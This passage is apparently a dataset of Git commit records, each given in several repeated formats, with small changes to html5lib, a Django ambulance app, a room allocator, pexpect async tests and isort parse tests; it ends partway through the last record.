eea8b5622ced613cde54e6d09cd98f6483543dfd | tests/test_parser2.py | tests/test_parser2.py | import support
from html5lib import html5parser
from html5lib.treebuilders import dom
import unittest
# tests that aren't autogenerated from text files
class MoreParserTests(unittest.TestCase):
def test_assertDoctypeCloneable(self):
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
doc = parser.parse('<!DOCTYPE HTML>')
self.assert_(doc.cloneNode(True))
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
| import support
from html5lib import html5parser
from html5lib.treebuilders import dom
import unittest
# tests that aren't autogenerated from text files
class MoreParserTests(unittest.TestCase):
def test_assertDoctypeCloneable(self):
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
doc = parser.parse('<!DOCTYPE HTML>')
self.assert_(doc.cloneNode(True))
def test_line_counter(self):
# http://groups.google.com/group/html5lib-discuss/browse_frm/thread/f4f00e4a2f26d5c0
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
parser.parse("<pre>\nx\n>\n</pre>")
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
| Add a test case to ensure that this continues to work | Add a test case to ensure that this continues to work
--HG--
extra : convert_revision : svn%3Aacbfec75-9323-0410-a652-858a13e371e0/trunk%40952
| Python | mit | alex/html5lib-python,html5lib/html5lib-python,mgilson/html5lib-python,mindw/html5lib-python,ordbogen/html5lib-python,mgilson/html5lib-python,mindw/html5lib-python,html5lib/html5lib-python,dstufft/html5lib-python,alex/html5lib-python,ordbogen/html5lib-python,mindw/html5lib-python,dstufft/html5lib-python,html5lib/html5lib-python,alex/html5lib-python,mgilson/html5lib-python,gsnedders/html5lib-python,ordbogen/html5lib-python,gsnedders/html5lib-python,dstufft/html5lib-python | import support
from html5lib import html5parser
from html5lib.treebuilders import dom
import unittest
# tests that aren't autogenerated from text files
class MoreParserTests(unittest.TestCase):
def test_assertDoctypeCloneable(self):
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
doc = parser.parse('<!DOCTYPE HTML>')
self.assert_(doc.cloneNode(True))
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
Add a test case to ensure that this continues to work
--HG--
extra : convert_revision : svn%3Aacbfec75-9323-0410-a652-858a13e371e0/trunk%40952 | import support
from html5lib import html5parser
from html5lib.treebuilders import dom
import unittest
# tests that aren't autogenerated from text files
class MoreParserTests(unittest.TestCase):
def test_assertDoctypeCloneable(self):
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
doc = parser.parse('<!DOCTYPE HTML>')
self.assert_(doc.cloneNode(True))
def test_line_counter(self):
# http://groups.google.com/group/html5lib-discuss/browse_frm/thread/f4f00e4a2f26d5c0
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
parser.parse("<pre>\nx\n>\n</pre>")
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
| <commit_before>import support
from html5lib import html5parser
from html5lib.treebuilders import dom
import unittest
# tests that aren't autogenerated from text files
class MoreParserTests(unittest.TestCase):
def test_assertDoctypeCloneable(self):
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
doc = parser.parse('<!DOCTYPE HTML>')
self.assert_(doc.cloneNode(True))
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
<commit_msg>Add a test case to ensure that this continues to work
--HG--
extra : convert_revision : svn%3Aacbfec75-9323-0410-a652-858a13e371e0/trunk%40952<commit_after> | import support
from html5lib import html5parser
from html5lib.treebuilders import dom
import unittest
# tests that aren't autogenerated from text files
class MoreParserTests(unittest.TestCase):
def test_assertDoctypeCloneable(self):
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
doc = parser.parse('<!DOCTYPE HTML>')
self.assert_(doc.cloneNode(True))
def test_line_counter(self):
# http://groups.google.com/group/html5lib-discuss/browse_frm/thread/f4f00e4a2f26d5c0
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
parser.parse("<pre>\nx\n>\n</pre>")
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
| import support
from html5lib import html5parser
from html5lib.treebuilders import dom
import unittest
# tests that aren't autogenerated from text files
class MoreParserTests(unittest.TestCase):
def test_assertDoctypeCloneable(self):
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
doc = parser.parse('<!DOCTYPE HTML>')
self.assert_(doc.cloneNode(True))
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
Add a test case to ensure that this continues to work
--HG--
extra : convert_revision : svn%3Aacbfec75-9323-0410-a652-858a13e371e0/trunk%40952import support
from html5lib import html5parser
from html5lib.treebuilders import dom
import unittest
# tests that aren't autogenerated from text files
class MoreParserTests(unittest.TestCase):
def test_assertDoctypeCloneable(self):
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
doc = parser.parse('<!DOCTYPE HTML>')
self.assert_(doc.cloneNode(True))
def test_line_counter(self):
# http://groups.google.com/group/html5lib-discuss/browse_frm/thread/f4f00e4a2f26d5c0
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
parser.parse("<pre>\nx\n>\n</pre>")
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
| <commit_before>import support
from html5lib import html5parser
from html5lib.treebuilders import dom
import unittest
# tests that aren't autogenerated from text files
class MoreParserTests(unittest.TestCase):
def test_assertDoctypeCloneable(self):
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
doc = parser.parse('<!DOCTYPE HTML>')
self.assert_(doc.cloneNode(True))
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
<commit_msg>Add a test case to ensure that this continues to work
--HG--
extra : convert_revision : svn%3Aacbfec75-9323-0410-a652-858a13e371e0/trunk%40952<commit_after>import support
from html5lib import html5parser
from html5lib.treebuilders import dom
import unittest
# tests that aren't autogenerated from text files
class MoreParserTests(unittest.TestCase):
def test_assertDoctypeCloneable(self):
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
doc = parser.parse('<!DOCTYPE HTML>')
self.assert_(doc.cloneNode(True))
def test_line_counter(self):
# http://groups.google.com/group/html5lib-discuss/browse_frm/thread/f4f00e4a2f26d5c0
parser = html5parser.HTMLParser(tree=dom.TreeBuilder)
parser.parse("<pre>\nx\n>\n</pre>")
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
|
7d362cfc37398a22440173fa7209224a2542778e | eng100l/ambulances/urls.py | eng100l/ambulances/urls.py | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^update/(?P<pk>[0-9]+)$',
views.AmbulanceUpdateView.as_view(),
name="ambulance_update"),
url(r'^info/(?P<pk>[0-9]+)$',
views.AmbulanceInfoView.as_view(),
name="ambulance_info"),
url(r'^ambulance_create$',
views.AmbulanceCreateView.as_view(),
name="ambulance_create"),
]
| from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^update/(?P<pk>[0-9]+)$',
views.AmbulanceUpdateView.as_view(),
name="ambulance_update"),
url(r'^info/(?P<pk>[0-9]+)$',
views.AmbulanceInfoView.as_view(),
name="ambulance_info"),
url(r'^create$',
views.AmbulanceCreateView.as_view(),
name="ambulance_create"),
]
| Simplify URL for ambulance creation | Simplify URL for ambulance creation
| Python | bsd-3-clause | EMSTrack/WebServerAndClient,EMSTrack/WebServerAndClient,EMSTrack/WebServerAndClient | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^update/(?P<pk>[0-9]+)$',
views.AmbulanceUpdateView.as_view(),
name="ambulance_update"),
url(r'^info/(?P<pk>[0-9]+)$',
views.AmbulanceInfoView.as_view(),
name="ambulance_info"),
url(r'^ambulance_create$',
views.AmbulanceCreateView.as_view(),
name="ambulance_create"),
]
Simplify URL for ambulance creation | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^update/(?P<pk>[0-9]+)$',
views.AmbulanceUpdateView.as_view(),
name="ambulance_update"),
url(r'^info/(?P<pk>[0-9]+)$',
views.AmbulanceInfoView.as_view(),
name="ambulance_info"),
url(r'^create$',
views.AmbulanceCreateView.as_view(),
name="ambulance_create"),
]
| <commit_before>from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^update/(?P<pk>[0-9]+)$',
views.AmbulanceUpdateView.as_view(),
name="ambulance_update"),
url(r'^info/(?P<pk>[0-9]+)$',
views.AmbulanceInfoView.as_view(),
name="ambulance_info"),
url(r'^ambulance_create$',
views.AmbulanceCreateView.as_view(),
name="ambulance_create"),
]
<commit_msg>Simplify URL for ambulance creation<commit_after> | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^update/(?P<pk>[0-9]+)$',
views.AmbulanceUpdateView.as_view(),
name="ambulance_update"),
url(r'^info/(?P<pk>[0-9]+)$',
views.AmbulanceInfoView.as_view(),
name="ambulance_info"),
url(r'^create$',
views.AmbulanceCreateView.as_view(),
name="ambulance_create"),
]
| from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^update/(?P<pk>[0-9]+)$',
views.AmbulanceUpdateView.as_view(),
name="ambulance_update"),
url(r'^info/(?P<pk>[0-9]+)$',
views.AmbulanceInfoView.as_view(),
name="ambulance_info"),
url(r'^ambulance_create$',
views.AmbulanceCreateView.as_view(),
name="ambulance_create"),
]
Simplify URL for ambulance creationfrom django.conf.urls import url
from . import views
urlpatterns = [
url(r'^update/(?P<pk>[0-9]+)$',
views.AmbulanceUpdateView.as_view(),
name="ambulance_update"),
url(r'^info/(?P<pk>[0-9]+)$',
views.AmbulanceInfoView.as_view(),
name="ambulance_info"),
url(r'^create$',
views.AmbulanceCreateView.as_view(),
name="ambulance_create"),
]
| <commit_before>from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^update/(?P<pk>[0-9]+)$',
views.AmbulanceUpdateView.as_view(),
name="ambulance_update"),
url(r'^info/(?P<pk>[0-9]+)$',
views.AmbulanceInfoView.as_view(),
name="ambulance_info"),
url(r'^ambulance_create$',
views.AmbulanceCreateView.as_view(),
name="ambulance_create"),
]
<commit_msg>Simplify URL for ambulance creation<commit_after>from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^update/(?P<pk>[0-9]+)$',
views.AmbulanceUpdateView.as_view(),
name="ambulance_update"),
url(r'^info/(?P<pk>[0-9]+)$',
views.AmbulanceInfoView.as_view(),
name="ambulance_info"),
url(r'^create$',
views.AmbulanceCreateView.as_view(),
name="ambulance_create"),
]
|
9fba993ea52df48de8d812c1ad0128d48c8ab4cf | classes/room.py | classes/room.py | class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
else:
return "Room is at full capacity"
| class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
print (person.person_type.title() + " " + person.person_name.title() + " " + person.person_surname.title() + " has been allocated " + self.room_type + " " + self.room_name.title())
else:
raise Exception(self.room_type.title() + " " + self.room_name.title() + " is at full capacity")
| Add Error statement to add_occupant method for when max capacity is reached | Add Error statement to add_occupant method for when max capacity is reached
| Python | mit | peterpaints/room-allocator | class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
else:
return "Room is at full capacity"
Add Error statement to add_occupant method for when max capacity is reached | class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
print (person.person_type.title() + " " + person.person_name.title() + " " + person.person_surname.title() + " has been allocated " + self.room_type + " " + self.room_name.title())
else:
raise Exception(self.room_type.title() + " " + self.room_name.title() + " is at full capacity")
| <commit_before>class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
else:
return "Room is at full capacity"
<commit_msg>Add Error statement to add_occupant method for when max capacity is reached<commit_after> | class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
print (person.person_type.title() + " " + person.person_name.title() + " " + person.person_surname.title() + " has been allocated " + self.room_type + " " + self.room_name.title())
else:
raise Exception(self.room_type.title() + " " + self.room_name.title() + " is at full capacity")
| class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
else:
return "Room is at full capacity"
Add Error statement to add_occupant method for when max capacity is reachedclass Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
print (person.person_type.title() + " " + person.person_name.title() + " " + person.person_surname.title() + " has been allocated " + self.room_type + " " + self.room_name.title())
else:
raise Exception(self.room_type.title() + " " + self.room_name.title() + " is at full capacity")
| <commit_before>class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
else:
return "Room is at full capacity"
<commit_msg>Add Error statement to add_occupant method for when max capacity is reached<commit_after>class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
print (person.person_type.title() + " " + person.person_name.title() + " " + person.person_surname.title() + " has been allocated " + self.room_type + " " + self.room_name.title())
else:
raise Exception(self.room_type.title() + " " + self.room_name.title() + " is at full capacity")
|
d9fc2cfdcfaf13f2e8491ace60680f3c94ad5c83 | tests/test_async.py | tests/test_async.py | try:
import asyncio
loop = asyncio.get_event_loop()
except ImportError:
asyncio = None
import pexpect
import unittest
@unittest.skipIf(asyncio is None, "Requires asyncio")
class AsyncTests(unittest.TestCase):
def test_simple_expect(self):
p = pexpect.spawn('cat')
p.sendline('Hello asyncio')
coro = p.expect('Hello', async=True)
task = asyncio.Task(coro)
results = []
def complete(task):
results.append(task.result())
task.add_done_callback(complete)
loop.run_until_complete(task)
assert results == [0] | try:
import asyncio
except ImportError:
asyncio = None
import pexpect
import unittest
def run(coro):
return asyncio.get_event_loop().run_until_complete(coro)
@unittest.skipIf(asyncio is None, "Requires asyncio")
class AsyncTests(unittest.TestCase):
def test_simple_expect(self):
p = pexpect.spawn('cat')
p.sendline('Hello asyncio')
coro = p.expect(['Hello', pexpect.EOF] , async=True)
assert run(coro) == 0
print('Done')
def test_timeout(self):
p = pexpect.spawn('cat')
coro = p.expect('foo', timeout=1, async=True)
with self.assertRaises(pexpect.TIMEOUT):
run(coro)
p = pexpect.spawn('cat')
coro = p.expect(['foo', pexpect.TIMEOUT], timeout=1, async=True)
assert run(coro) == 1
def test_eof(self):
p = pexpect.spawn('cat')
p.sendline('Hi')
coro = p.expect(pexpect.EOF, async=True)
p.sendeof()
assert run(coro) == 0
p = pexpect.spawn('cat')
p.sendeof()
coro = p.expect('Blah', async=True)
with self.assertRaises(pexpect.EOF):
run(coro) | Expand tests for async expect | Expand tests for async expect
| Python | isc | dongguangming/pexpect,quatanium/pexpect,crdoconnor/pexpect,Depado/pexpect,crdoconnor/pexpect,dongguangming/pexpect,crdoconnor/pexpect,Wakeupbuddy/pexpect,nodish/pexpect,Wakeupbuddy/pexpect,blink1073/pexpect,nodish/pexpect,quatanium/pexpect,bangi123/pexpect,dongguangming/pexpect,bangi123/pexpect,quatanium/pexpect,Depado/pexpect,Wakeupbuddy/pexpect,blink1073/pexpect,dongguangming/pexpect,Wakeupbuddy/pexpect,nodish/pexpect,Depado/pexpect,blink1073/pexpect,bangi123/pexpect,Depado/pexpect,bangi123/pexpect | try:
import asyncio
loop = asyncio.get_event_loop()
except ImportError:
asyncio = None
import pexpect
import unittest
@unittest.skipIf(asyncio is None, "Requires asyncio")
class AsyncTests(unittest.TestCase):
def test_simple_expect(self):
p = pexpect.spawn('cat')
p.sendline('Hello asyncio')
coro = p.expect('Hello', async=True)
task = asyncio.Task(coro)
results = []
def complete(task):
results.append(task.result())
task.add_done_callback(complete)
loop.run_until_complete(task)
assert results == [0]Expand tests for async expect | try:
import asyncio
except ImportError:
asyncio = None
import pexpect
import unittest
def run(coro):
return asyncio.get_event_loop().run_until_complete(coro)
@unittest.skipIf(asyncio is None, "Requires asyncio")
class AsyncTests(unittest.TestCase):
def test_simple_expect(self):
p = pexpect.spawn('cat')
p.sendline('Hello asyncio')
coro = p.expect(['Hello', pexpect.EOF] , async=True)
assert run(coro) == 0
print('Done')
def test_timeout(self):
p = pexpect.spawn('cat')
coro = p.expect('foo', timeout=1, async=True)
with self.assertRaises(pexpect.TIMEOUT):
run(coro)
p = pexpect.spawn('cat')
coro = p.expect(['foo', pexpect.TIMEOUT], timeout=1, async=True)
assert run(coro) == 1
def test_eof(self):
p = pexpect.spawn('cat')
p.sendline('Hi')
coro = p.expect(pexpect.EOF, async=True)
p.sendeof()
assert run(coro) == 0
p = pexpect.spawn('cat')
p.sendeof()
coro = p.expect('Blah', async=True)
with self.assertRaises(pexpect.EOF):
run(coro) | <commit_before>try:
import asyncio
loop = asyncio.get_event_loop()
except ImportError:
asyncio = None
import pexpect
import unittest
@unittest.skipIf(asyncio is None, "Requires asyncio")
class AsyncTests(unittest.TestCase):
def test_simple_expect(self):
p = pexpect.spawn('cat')
p.sendline('Hello asyncio')
coro = p.expect('Hello', async=True)
task = asyncio.Task(coro)
results = []
def complete(task):
results.append(task.result())
task.add_done_callback(complete)
loop.run_until_complete(task)
assert results == [0]<commit_msg>Expand tests for async expect<commit_after> | try:
import asyncio
except ImportError:
asyncio = None
import pexpect
import unittest
def run(coro):
return asyncio.get_event_loop().run_until_complete(coro)
@unittest.skipIf(asyncio is None, "Requires asyncio")
class AsyncTests(unittest.TestCase):
def test_simple_expect(self):
p = pexpect.spawn('cat')
p.sendline('Hello asyncio')
coro = p.expect(['Hello', pexpect.EOF] , async=True)
assert run(coro) == 0
print('Done')
def test_timeout(self):
p = pexpect.spawn('cat')
coro = p.expect('foo', timeout=1, async=True)
with self.assertRaises(pexpect.TIMEOUT):
run(coro)
p = pexpect.spawn('cat')
coro = p.expect(['foo', pexpect.TIMEOUT], timeout=1, async=True)
assert run(coro) == 1
def test_eof(self):
p = pexpect.spawn('cat')
p.sendline('Hi')
coro = p.expect(pexpect.EOF, async=True)
p.sendeof()
assert run(coro) == 0
p = pexpect.spawn('cat')
p.sendeof()
coro = p.expect('Blah', async=True)
with self.assertRaises(pexpect.EOF):
run(coro) | try:
import asyncio
loop = asyncio.get_event_loop()
except ImportError:
asyncio = None
import pexpect
import unittest
@unittest.skipIf(asyncio is None, "Requires asyncio")
class AsyncTests(unittest.TestCase):
def test_simple_expect(self):
p = pexpect.spawn('cat')
p.sendline('Hello asyncio')
coro = p.expect('Hello', async=True)
task = asyncio.Task(coro)
results = []
def complete(task):
results.append(task.result())
task.add_done_callback(complete)
loop.run_until_complete(task)
assert results == [0]Expand tests for async expecttry:
import asyncio
except ImportError:
asyncio = None
import pexpect
import unittest
def run(coro):
return asyncio.get_event_loop().run_until_complete(coro)
@unittest.skipIf(asyncio is None, "Requires asyncio")
class AsyncTests(unittest.TestCase):
def test_simple_expect(self):
p = pexpect.spawn('cat')
p.sendline('Hello asyncio')
coro = p.expect(['Hello', pexpect.EOF] , async=True)
assert run(coro) == 0
print('Done')
def test_timeout(self):
p = pexpect.spawn('cat')
coro = p.expect('foo', timeout=1, async=True)
with self.assertRaises(pexpect.TIMEOUT):
run(coro)
p = pexpect.spawn('cat')
coro = p.expect(['foo', pexpect.TIMEOUT], timeout=1, async=True)
assert run(coro) == 1
def test_eof(self):
p = pexpect.spawn('cat')
p.sendline('Hi')
coro = p.expect(pexpect.EOF, async=True)
p.sendeof()
assert run(coro) == 0
p = pexpect.spawn('cat')
p.sendeof()
coro = p.expect('Blah', async=True)
with self.assertRaises(pexpect.EOF):
run(coro) | <commit_before>try:
import asyncio
loop = asyncio.get_event_loop()
except ImportError:
asyncio = None
import pexpect
import unittest
@unittest.skipIf(asyncio is None, "Requires asyncio")
class AsyncTests(unittest.TestCase):
def test_simple_expect(self):
p = pexpect.spawn('cat')
p.sendline('Hello asyncio')
coro = p.expect('Hello', async=True)
task = asyncio.Task(coro)
results = []
def complete(task):
results.append(task.result())
task.add_done_callback(complete)
loop.run_until_complete(task)
assert results == [0]<commit_msg>Expand tests for async expect<commit_after>try:
import asyncio
except ImportError:
asyncio = None
import pexpect
import unittest
def run(coro):
return asyncio.get_event_loop().run_until_complete(coro)
@unittest.skipIf(asyncio is None, "Requires asyncio")
class AsyncTests(unittest.TestCase):
def test_simple_expect(self):
p = pexpect.spawn('cat')
p.sendline('Hello asyncio')
coro = p.expect(['Hello', pexpect.EOF] , async=True)
assert run(coro) == 0
print('Done')
def test_timeout(self):
p = pexpect.spawn('cat')
coro = p.expect('foo', timeout=1, async=True)
with self.assertRaises(pexpect.TIMEOUT):
run(coro)
p = pexpect.spawn('cat')
coro = p.expect(['foo', pexpect.TIMEOUT], timeout=1, async=True)
assert run(coro) == 1
def test_eof(self):
p = pexpect.spawn('cat')
p.sendline('Hi')
coro = p.expect(pexpect.EOF, async=True)
p.sendeof()
assert run(coro) == 0
p = pexpect.spawn('cat')
p.sendeof()
coro = p.expect('Blah', async=True)
with self.assertRaises(pexpect.EOF):
run(coro) |
aaac1ae0667dabe6fd038c9f5a42c157b9457ef1 | tests/test_parse.py | tests/test_parse.py | from hypothesis_auto import auto_pytest_magic
from isort import parse
from isort.settings import default
TEST_CONTENTS = """
import xyz
import abc
def function():
pass
"""
def test_file_contents():
(
in_lines,
out_lines,
import_index,
place_imports,
import_placements,
as_map,
imports,
categorized_comments,
first_comment_index_start,
first_comment_index_end,
change_count,
original_line_count,
line_separator,
sections,
section_comments,
) = parse.file_contents(TEST_CONTENTS, config=default)
assert "\n".join(in_lines) == TEST_CONTENTS
assert "import" not in "\n".join(out_lines)
assert import_index == 1
assert change_count == -2
assert original_line_count == len(in_lines)
auto_pytest_magic(parse.import_type)
auto_pytest_magic(parse.skip_line)
auto_pytest_magic(parse._strip_syntax)
auto_pytest_magic(parse._infer_line_separator)
| from hypothesis_auto import auto_pytest_magic
from isort import parse
from isort.settings import Config
TEST_CONTENTS = """
import xyz
import abc
def function():
pass
"""
def test_file_contents():
(
in_lines,
out_lines,
import_index,
place_imports,
import_placements,
as_map,
imports,
categorized_comments,
first_comment_index_start,
first_comment_index_end,
change_count,
original_line_count,
line_separator,
sections,
section_comments,
) = parse.file_contents(TEST_CONTENTS, config=Config())
assert "\n".join(in_lines) == TEST_CONTENTS
assert "import" not in "\n".join(out_lines)
assert import_index == 1
assert change_count == -2
assert original_line_count == len(in_lines)
auto_pytest_magic(parse.import_type)
auto_pytest_magic(parse.skip_line)
auto_pytest_magic(parse._strip_syntax)
auto_pytest_magic(parse._infer_line_separator)
| Fix use of default config to match new refactor | Fix use of default config to match new refactor
| Python | mit | PyCQA/isort,PyCQA/isort | from hypothesis_auto import auto_pytest_magic
from isort import parse
from isort.settings import default
TEST_CONTENTS = """
import xyz
import abc
def function():
pass
"""
def test_file_contents():
(
in_lines,
out_lines,
import_index,
place_imports,
import_placements,
as_map,
imports,
categorized_comments,
first_comment_index_start,
first_comment_index_end,
change_count,
original_line_count,
line_separator,
sections,
section_comments,
) = parse.file_contents(TEST_CONTENTS, config=default)
assert "\n".join(in_lines) == TEST_CONTENTS
assert "import" not in "\n".join(out_lines)
assert import_index == 1
assert change_count == -2
assert original_line_count == len(in_lines)
auto_pytest_magic(parse.import_type)
auto_pytest_magic(parse.skip_line)
auto_pytest_magic(parse._strip_syntax)
auto_pytest_magic(parse._infer_line_separator)
Fix use of default config to match new refactor | from hypothesis_auto import auto_pytest_magic
from isort import parse
from isort.settings import Config
TEST_CONTENTS = """
import xyz
import abc
def function():
pass
"""
def test_file_contents():
(
in_lines,
out_lines,
import_index,
place_imports,
import_placements,
as_map,
imports,
categorized_comments,
first_comment_index_start,
first_comment_index_end,
change_count,
original_line_count,
line_separator,
sections,
section_comments,
) = parse.file_contents(TEST_CONTENTS, config=Config())
assert "\n".join(in_lines) == TEST_CONTENTS
assert "import" not in "\n".join(out_lines)
assert import_index == 1
assert change_count == -2
assert original_line_count == len(in_lines)
auto_pytest_magic(parse.import_type)
auto_pytest_magic(parse.skip_line)
auto_pytest_magic(parse._strip_syntax)
auto_pytest_magic(parse._infer_line_separator)
| <commit_before>from hypothesis_auto import auto_pytest_magic
from isort import parse
from isort.settings import default
TEST_CONTENTS = """
import xyz
import abc
def function():
pass
"""
def test_file_contents():
(
in_lines,
out_lines,
import_index,
place_imports,
import_placements,
as_map,
imports,
categorized_comments,
first_comment_index_start,
first_comment_index_end,
change_count,
original_line_count,
line_separator,
sections,
section_comments,
) = parse.file_contents(TEST_CONTENTS, config=default)
assert "\n".join(in_lines) == TEST_CONTENTS
assert "import" not in "\n".join(out_lines)
assert import_index == 1
assert change_count == -2
assert original_line_count == len(in_lines)
auto_pytest_magic(parse.import_type)
auto_pytest_magic(parse.skip_line)
auto_pytest_magic(parse._strip_syntax)
auto_pytest_magic(parse._infer_line_separator)
<commit_msg>Fix use of default config to match new refactor<commit_after> | from hypothesis_auto import auto_pytest_magic
from isort import parse
from isort.settings import Config
TEST_CONTENTS = """
import xyz
import abc
def function():
pass
"""
def test_file_contents():
(
in_lines,
out_lines,
import_index,
place_imports,
import_placements,
as_map,
imports,
categorized_comments,
first_comment_index_start,
first_comment_index_end,
change_count,
original_line_count,
line_separator,
sections,
section_comments,
) = parse.file_contents(TEST_CONTENTS, config=Config())
assert "\n".join(in_lines) == TEST_CONTENTS
assert "import" not in "\n".join(out_lines)
assert import_index == 1
assert change_count == -2
assert original_line_count == len(in_lines)
auto_pytest_magic(parse.import_type)
auto_pytest_magic(parse.skip_line)
auto_pytest_magic(parse._strip_syntax)
auto_pytest_magic(parse._infer_line_separator)
| from hypothesis_auto import auto_pytest_magic
from isort import parse
from isort.settings import default
TEST_CONTENTS = """
import xyz
import abc
def function():
pass
"""
def test_file_contents():
(
in_lines,
out_lines,
import_index,
place_imports,
import_placements,
as_map,
imports,
categorized_comments,
first_comment_index_start,
first_comment_index_end,
change_count,
original_line_count,
line_separator,
sections,
section_comments,
) = parse.file_contents(TEST_CONTENTS, config=default)
assert "\n".join(in_lines) == TEST_CONTENTS
assert "import" not in "\n".join(out_lines)
assert import_index == 1
assert change_count == -2
assert original_line_count == len(in_lines)
auto_pytest_magic(parse.import_type)
auto_pytest_magic(parse.skip_line)
auto_pytest_magic(parse._strip_syntax)
auto_pytest_magic(parse._infer_line_separator)
Fix use of default config to match new refactorfrom hypothesis_auto import auto_pytest_magic
from isort import parse
from isort.settings import Config
TEST_CONTENTS = """
import xyz
import abc
def function():
pass
"""
def test_file_contents():
(
in_lines,
out_lines,
import_index,
place_imports,
import_placements,
as_map,
imports,
categorized_comments,
first_comment_index_start,
first_comment_index_end,
change_count,
original_line_count,
line_separator,
sections,
section_comments,
) = parse.file_contents(TEST_CONTENTS, config=Config())
assert "\n".join(in_lines) == TEST_CONTENTS
assert "import" not in "\n".join(out_lines)
assert import_index == 1
assert change_count == -2
assert original_line_count == len(in_lines)
auto_pytest_magic(parse.import_type)
auto_pytest_magic(parse.skip_line)
auto_pytest_magic(parse._strip_syntax)
auto_pytest_magic(parse._infer_line_separator)
| <commit_before>from hypothesis_auto import auto_pytest_magic
from isort import parse
from isort.settings import default
TEST_CONTENTS = """
import xyz
import abc
def function():
pass
"""
def test_file_contents():
(
in_lines,
out_lines,
import_index,
place_imports,
import_placements,
as_map,
imports,
categorized_comments,
first_comment_index_start,
first_comment_index_end,
change_count,
original_line_count,
line_separator,
sections,
section_comments,
) = parse.file_contents(TEST_CONTENTS, config=default)
assert "\n".join(in_lines) == TEST_CONTENTS
assert "import" not in "\n".join(out_lines)
assert import_index == 1
assert change_count == -2
assert original_line_count == len(in_lines)
auto_pytest_magic(parse.import_type)
auto_pytest_magic(parse.skip_line)
auto_pytest_magic(parse._strip_syntax)
auto_pytest_magic(parse._infer_line_separator)
<commit_msg>Fix use of default config to match new refactor<commit_after>from hypothesis_auto import auto_pytest_magic
from isort import parse
from isort.settings import Config
TEST_CONTENTS = """
import xyz
import abc
def function():
pass
"""
def test_file_contents():
(
in_lines,
out_lines,
import_index,
place_imports,
import_placements,
as_map,
imports,
categorized_comments,
first_comment_index_start,
first_comment_index_end,
change_count,
original_line_count,
line_separator,
sections,
section_comments,
